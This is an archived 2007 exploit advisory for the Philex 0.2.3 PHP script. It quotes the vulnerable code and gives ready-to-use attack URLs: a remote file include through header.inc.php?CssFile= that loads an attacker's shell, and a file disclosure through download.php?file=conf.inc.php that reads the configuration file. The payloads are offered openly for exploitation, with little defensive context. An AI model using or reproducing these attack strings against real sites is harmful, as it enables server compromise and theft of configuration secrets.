Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities
# Published : 2007-03-23
# Author : GoLd_M
# Previous Title : Active Auction Pro 7.1 (default.asp catid) SQL Injection Vulnerability
# Next Title : Active Newsletter <= 4.3 (ViewNewspapers.asp) SQL Injection Exploit

######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# www.Syue.com [2007-03-23]